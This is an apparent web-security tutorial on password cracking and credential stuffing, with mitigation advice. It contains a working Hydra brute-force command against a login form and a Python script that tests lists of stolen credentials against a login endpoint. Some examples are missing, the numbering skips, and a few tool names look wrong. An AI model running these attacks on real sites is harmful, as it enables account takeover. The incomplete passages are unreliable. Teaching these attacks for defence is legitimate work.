Credential Stuffing
Web applications often rely on password-based authentication, making weak or reused credentials a critical attack surface. This section explores techniques for exploiting password vulnerabilities, including brute-force attacks and credential stuffing, along with tools and strategies to mitigate these risks.
Password Cracking Techniques¶
Password cracking involves systematically guessing or deriving credentials to bypass authentication. Common methods include:
1. Brute-force and Dictionary Attacks¶
Tools like Hydra, John the Ripper, and Hashcat automate guessing passwords by leveraging dictionaries or character combinations.
- Hydra targets protocols like HTTP-FORM-POST or SSH:
hydra -t 4 -l admin -P /path/to/passwords.txt http-post-form "/login:username=^USER^&password=^PASS^:F=error" target.com
- Hashcat uses GPU acceleration for cracking:
2. Rainbow Tables¶
Precomputed hash-value tables (e.g., for MD5, SHA-1) allow rapid lookup of hashes. Tools like rkhash or Rcrack can exploit these.
3. Password Spraying¶
Attackers guess common passwords (e.g., "Password123") against multiple accounts to bypass rate limits.
Credential Stuffing¶
Credential stuffing leverages stolen credentials from data breaches to automate login attempts. Tools like Parrot OS or custom scripts (e.g., Python) are used:
import requests
with open("credentials.txt", "r") as f:
for line in f:
username, password = line.strip().split(":")
response = requests.post("https://target.com/login", data={"user": username, "pass": password})
if "success" in response.text:
print(f"Valid credentials: {username}:{password}")
Mitigation Strategies¶
Defenders should implement:
1. Strong Password Policies: Enforce complexity, length, and expiration. Example regex for minimum complexity:
3. Multi-Factor Authentication (MFA): Add layers beyond passwords (e.g., TOTP).
4. Monitoring: Detect anomalies (e.g., login attempts from new IPs).
Key takeaways¶
- Password cracking tools like Hydra and Hashcat exploit weak or reused credentials.
- Credential stuffing uses stolen credentials from breaches to bypass authentication.
- Defenders must enforce strong password policies, MFA, and rate limiting to mitigate these risks.